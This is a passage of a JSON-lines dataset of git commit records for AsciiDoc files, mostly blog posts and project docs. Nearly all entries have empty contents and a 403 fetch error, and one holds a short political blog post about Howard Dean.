403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4cdd45d27fdc89143b22b4227aa575a95fd1aa0f","subject":"Update 2016-08-09-TP.adoc","message":"Update 2016-08-09-TP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-TP.adoc","new_file":"_posts\/2016-08-09-TP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4db0f963d423a2bd308676876f9e8fb2320fdeff","subject":"Update 20161110-1347.adoc","message":"Update 20161110-1347.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1347.adoc","new_file":"_posts\/20161110-1347.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"164807f524502fe5050fbde78d9f27ac790da5a2","subject":"Update 2015-05-18-A-Remplacer.adoc","message":"Update 2015-05-18-A-Remplacer.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-05-18-A-Remplacer.adoc","new_file":"_posts\/2015-05-18-A-Remplacer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3573e69ed09b67f2058c524faa03dc83eb42114b","subject":"Update 2015-02-26-Referencia-rapida-para-el-uso-de-Composer-Espanol.adoc","message":"Update 2015-02-26-Referencia-rapida-para-el-uso-de-Composer-Espanol.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-26-Referencia-rapida-para-el-uso-de-Composer-Espanol.adoc","new_file":"_posts\/2015-02-26-Referencia-rapida-para-el-uso-de-Composer-Espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aac5c6066f6ec622000a0d6442431a088ac1a315","subject":"Add README section 
detailing relationship to Trace Compass","message":"Add README section detailing relationship to Trace Compass\n\nFixes #21.\n\nSigned-off-by: Alexandre Montplaisir <0b9d8e7da097b5bbfe36e48cca5acfe475f18227@efficios.com>\n","repos":"lttng\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope,lttng\/lttng-scope,lttng\/lttng-scope,alexmonthy\/lttng-scope","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lttng\/lttng-scope.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"749ca9de7b8da90d9ee69cd8f100b49ab5f6c1d3","subject":"Clarify build instructions","message":"Clarify build instructions\n\nCloses gh-272\n","repos":"bclozel\/initializr,snicoll\/initializr,nevenc-pivotal\/initializr,gwidgets\/gwt-project-generator,Arsene07\/forge,gwidgets\/gwt-project-generator,gwidgets\/gwt-project-generator,Arsene07\/forge,spring-io\/initializr,bclozel\/initializr,Arsene07\/forge,Arsene07\/forge,snicoll\/initializr,bclozel\/initializr,gwidgets\/gwt-project-generator,spring-io\/initializr,nevenc-pivotal\/initializr,Arsene07\/forge,nevenc-pivotal\/initializr,spring-io\/initializr,bclozel\/initializr,nevenc-pivotal\/initializr,snicoll\/initializr,bclozel\/initializr,nevenc-pivotal\/initializr","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/snicoll\/initializr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db4d0a653caea6f9be47072555c70ba601d6004b","subject":"[docs] - Fix python development section location","message":"[docs] - Fix python development section location\n\nThe Python Client section on the development is wedged between\ntwo of the Spark sub-sections, this patch fixes that issue.\n\nChange-Id: Ia437a3c139f81540e9f6883347afd90cdc565a0a\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5414\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu","old_file":"docs\/developing.adoc","new_file":"docs\/developing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1953ace95375571ae4f20d129e953c5f55ea1e62","subject":"Update 2017-07-13-Como-pensar-em-Prolog.adoc","message":"Update 
2017-07-13-Como-pensar-em-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"485c48af5af89b4349db669e7e0b9056ce147c12","subject":"Change Log introduced","message":"Change Log introduced\n","repos":"juxt\/yada,mbutlerw\/yada,mbutlerw\/yada,juxt\/yada,juxt\/yada,mbutlerw\/yada,delitescere\/yada,delitescere\/yada,delitescere\/yada","old_file":"CHANGES.adoc","new_file":"CHANGES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbutlerw\/yada.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d97fefeacbe9442c4b28372bd879239c29f8213e","subject":"Update 2016-09-28-asd.adoc","message":"Update 2016-09-28-asd.adoc","repos":"jaganz\/jaganz.github.io,jaganz\/jaganz.github.io,jaganz\/jaganz.github.io,jaganz\/jaganz.github.io","old_file":"_posts\/2016-09-28-asd.adoc","new_file":"_posts\/2016-09-28-asd.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaganz\/jaganz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"616526f6f66acd151e9e5797ad125d6f33c75220","subject":"Update 2016-04-19-I-Pv4-Subnetting.adoc","message":"Update 2016-04-19-I-Pv4-Subnetting.adoc","repos":"julianrichen\/blog,julianrichen\/blog,julianrichen\/blog,julianrichen\/blog","old_file":"_posts\/2016-04-19-I-Pv4-Subnetting.adoc","new_file":"_posts\/2016-04-19-I-Pv4-Subnetting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/julianrichen\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebbef98a5f94885f587fa119a498d9326d8d4085","subject":"Create jme3_ai.adoc","message":"Create jme3_ai.adoc\n\nMoved to advanced dir.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/jme3_ai.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/jme3_ai.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"a02f1b5b5c4a02dca3379e326c9e26d026395d69","subject":"Update 2016-09-23-test.adoc","message":"Update 2016-09-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-test.adoc","new_file":"_posts\/2016-09-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd49fa686a7072d591c3f6499e9bc2d6111ffc9d","subject":"Update 2017-02-05-test.adoc","message":"Update 
2017-02-05-test.adoc","repos":"celsogg\/blog,celsogg\/blog,celsogg\/blog,celsogg\/blog","old_file":"_posts\/2017-02-05-test.adoc","new_file":"_posts\/2017-02-05-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/celsogg\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"449d6525cb42e10b23fd6cbfc68c052bce73cf5f","subject":"Update 2017-05-27-rest.adoc","message":"Update 2017-05-27-rest.adoc","repos":"cszongyang\/myzone,cszongyang\/myzone","old_file":"_posts\/2017-05-27-rest.adoc","new_file":"_posts\/2017-05-27-rest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cszongyang\/myzone.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3468ce18b40b93e79b2113298c03c0519ca74a7d","subject":"Update 2017-05-30-Test.adoc","message":"Update 2017-05-30-Test.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-30-Test.adoc","new_file":"_posts\/2017-05-30-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d13d9c0a2334c596c827b2ddd92a019f4365879","subject":"Update 2018-11-11-Go-2.adoc","message":"Update 2018-11-11-Go-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Go-2.adoc","new_file":"_posts\/2018-11-11-Go-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4225cfd67f5d8cee6694ed077f9b58dc530191d5","subject":"Update 2016-08-07-Testing-1-2-3.adoc","message":"Update 2016-08-07-Testing-1-2-3.adoc","repos":"MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io,MatanRubin\/MatanRubin.github.io","old_file":"_posts\/2016-08-07-Testing-1-2-3.adoc","new_file":"_posts\/2016-08-07-Testing-1-2-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MatanRubin\/MatanRubin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf6a367cd974656af451f00a1053e8fa58e193e2","subject":"Update 2014-07-04-KISS.adoc","message":"Update 2014-07-04-KISS.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-07-04-KISS.adoc","new_file":"_posts\/2014-07-04-KISS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6030a500e3669fefbcbd1b66047ecf6e588079a2","subject":"Update 2016-12-14-demo.adoc","message":"Update 
2016-12-14-demo.adoc","repos":"moonPress\/press.io,moonPress\/press.io,moonPress\/press.io,moonPress\/press.io","old_file":"_posts\/2016-12-14-demo.adoc","new_file":"_posts\/2016-12-14-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moonPress\/press.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3e700ac36020c0d29bbca1708b7ab76d2b535c5","subject":"Update 2018-02-23-test.adoc","message":"Update 2018-02-23-test.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-test.adoc","new_file":"_posts\/2018-02-23-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f29b4246cd13ea6be67a96df31bc42aed94362f1","subject":"Update 2018-03-10-Azure-10.adoc","message":"Update 2018-03-10-Azure-10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-10-Azure-10.adoc","new_file":"_posts\/2018-03-10-Azure-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff40df65a71912effaa4ba33ba84a00e8396a5c1","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebaae7766ab5048c47e23bf754a022be82a6fda4","subject":"Add a coding style document","message":"Add a coding style document\n\nFixes 
#58\n","repos":"casimir\/kakoune,rstacruz\/kakoune,mawww\/kakoune,casimir\/kakoune,lenormf\/kakoune,jjthrash\/kakoune,flavius\/kakoune,zakgreant\/kakoune,Somasis\/kakoune,danr\/kakoune,elegios\/kakoune,jkonecny12\/kakoune,elegios\/kakoune,lenormf\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,Somasis\/kakoune,ekie\/kakoune,ekie\/kakoune,xificurC\/kakoune,rstacruz\/kakoune,danr\/kakoune,mawww\/kakoune,flavius\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,xificurC\/kakoune,occivink\/kakoune,alpha123\/kakoune,zakgreant\/kakoune,alexherbo2\/kakoune,casimir\/kakoune,elegios\/kakoune,ekie\/kakoune,Asenar\/kakoune,Asenar\/kakoune,rstacruz\/kakoune,alexherbo2\/kakoune,mawww\/kakoune,alpha123\/kakoune,xificurC\/kakoune,occivink\/kakoune,Asenar\/kakoune,ekie\/kakoune,danr\/kakoune,flavius\/kakoune,danr\/kakoune,xificurC\/kakoune,jkonecny12\/kakoune,danielma\/kakoune,casimir\/kakoune,Somasis\/kakoune,occivink\/kakoune,occivink\/kakoune,mawww\/kakoune,alexherbo2\/kakoune,zakgreant\/kakoune,Somasis\/kakoune,alpha123\/kakoune,jkonecny12\/kakoune,danielma\/kakoune,jjthrash\/kakoune,alpha123\/kakoune,jjthrash\/kakoune,jjthrash\/kakoune,danielma\/kakoune,Asenar\/kakoune,elegios\/kakoune,lenormf\/kakoune,flavius\/kakoune,lenormf\/kakoune,rstacruz\/kakoune","old_file":"doc\/coding-style.asciidoc","new_file":"doc\/coding-style.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"26ea9fdd0a7e55db9980d761c4220612e10e5624","subject":"Update 2018-02-27-Migration-to-Lightning-Experience-A-Developers-Guide.adoc","message":"Update 2018-02-27-Migration-to-Lightning-Experience-A-Developers-Guide.adoc","repos":"arshakian\/arshakian.github.io,arshakian\/arshakian.github.io,arshakian\/arshakian.github.io","old_file":"_posts\/2018-02-27-Migration-to-Lightning-Experience-A-Developers-Guide.adoc","new_file":"_posts\/2018-02-27-Migration-to-Lightning-Experience-A-Developers-Guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arshakian\/arshakian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"92261bab604c85dfb4a073102a9b7cc4887bfeae","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/hello_world_again.adoc","new_file":"content\/writings\/hello_world_again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"70fcb5ec7070d8cda1bffd9a79e7a2745195be6a","subject":"[docs] Add short troubleshooting note about nscd","message":"[docs] Add short troubleshooting note about nscd\n\nChange-Id: I9ace99c33d9161a0878c7c7570313ca5f895a7a9\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/10498\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nTested-by: Will Berkeley 
<c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu","old_file":"docs\/troubleshooting.adoc","new_file":"docs\/troubleshooting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7a403c528a92c18ae7576b949ff800fe1e86d638","subject":"Update 2015-07-11-Enthusiasm.adoc","message":"Update 2015-07-11-Enthusiasm.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-11-Enthusiasm.adoc","new_file":"_posts\/2015-07-11-Enthusiasm.adoc","new_contents":"= Enthusiasm.\n:hp-tags: politics\n\nimage::https:\/\/scontent-ams3-1.xx.fbcdn.net\/hphotos-xpf1\/v\/t1.0-9\/11014861_936544586383102_8303108115918938460_n.jpg?oh=773ce2a3dd72d234c67145fab380cd1e&oe=561AD611[]\n\nI honestly believe this is what happened to Howard Dean too. I was excited about Dean, he was the first candidate in my adult life who displayed anything like passion or enthusiasm or conviction.\n\nThe media drove him out of the race based entirely on footage of one enthusiastic shout.\n\nI wonder what the modern media would've made of Teddy Roosevelt.","old_contents":"","returncode":1,"stderr":"error: pathspec '_posts\/2015-07-11-Enthusiasm.adoc' did not match any file(s) known to git\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a127e91c296678ffc941323dfcc6576508300db","subject":"fixing link","message":"fixing link\n","repos":"brechin\/hypatia,brechin\/hypatia,hypatia-software-org\/hypatia-engine,lillian-lemmer\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hypatia-software-org\/hypatia-engine.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f042cc140d29e1e28885ac7f20b669f90ed626cf","subject":"Update 2015-02-06-How-To-Convert-a-Jekyll-Markdown-Blog-to-HubPress.adoc","message":"Update 2015-02-06-How-To-Convert-a-Jekyll-Markdown-Blog-to-HubPress.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-02-06-How-To-Convert-a-Jekyll-Markdown-Blog-to-HubPress.adoc","new_file":"_posts\/2015-02-06-How-To-Convert-a-Jekyll-Markdown-Blog-to-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d450c629d889d6106cf9ab30051522f7ba7a41dc","subject":"Update 2017-11-20-A-Stupids-Guide-to-Learning-Concepts.adoc","message":"Update 2017-11-20-A-Stupids-Guide-to-Learning-Concepts.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-A-Stupids-Guide-to-Learning-Concepts.adoc","new_file":"_posts\/2017-11-20-A-Stupids-Guide-to-Learning-Concepts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"624e3f2fd59f8ebb63ee132bbcdd71885e4d8299","subject":"Update 2016-06-21-A-Fairy-Tale.adoc","message":"Update 2016-06-21-A-Fairy-Tale.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2016-06-21-A-Fairy-Tale.adoc","new_file":"_posts\/2016-06-21-A-Fairy-Tale.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31e4f453dcdcfa86a1d24e6ba31c4522380ecf45","subject":"Update 2016-11-04-About-The-Dullest-Saga.adoc","message":"Update 2016-11-04-About-The-Dullest-Saga.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-04-About-The-Dullest-Saga.adoc","new_file":"_posts\/2016-11-04-About-The-Dullest-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"027443878c1e982fabc14e96364023dcc848c3a5","subject":"Update 2016-05-27-My-First-Post-with-Hub-Press.adoc","message":"Update 2016-05-27-My-First-Post-with-Hub-Press.adoc","repos":"thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io,thezorgan\/thezorgan.github.io","old_file":"_posts\/2016-05-27-My-First-Post-with-Hub-Press.adoc","new_file":"_posts\/2016-05-27-My-First-Post-with-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thezorgan\/thezorgan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87342f69e67e97a02c6d682ab2ca8911927671ec","subject":"Update 2017-05-23-Running-Payara-in-Kubernetes.adoc","message":"Update 2017-05-23-Running-Payara-in-Kubernetes.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-05-23-Running-Payara-in-Kubernetes.adoc","new_file":"_posts\/2017-05-23-Running-Payara-in-Kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d34e8e413157c72af284f2ffeb9243b06494f7a","subject":"Create README.adoc","message":"Create 
README.adoc","repos":"nmcl\/golang","old_file":"example\/src\/filedup\/README.adoc","new_file":"example\/src\/filedup\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmcl\/golang.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b8b1f76a11f8d4d256621f3dc57168f22cfa5664","subject":"Update 2015-08-03-Transition.adoc","message":"Update 2015-08-03-Transition.adoc","repos":"tedbergeron\/Transition,tedbergeron\/Transition,tedbergeron\/Transition","old_file":"_posts\/2015-08-03-Transition.adoc","new_file":"_posts\/2015-08-03-Transition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/Transition.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a87374b13e5388231e64f7794806939c4f6ca34a","subject":"Update 2015-08-09-Hola-Mundo.adoc","message":"Update 2015-08-09-Hola-Mundo.adoc","repos":"Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io","old_file":"_posts\/2015-08-09-Hola-Mundo.adoc","new_file":"_posts\/2015-08-09-Hola-Mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6cc54d8c94bfc0c050e8d09e89a10fbe63f98d2","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b32049bef205e713edc8a4bdda432f2dd70f224d","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 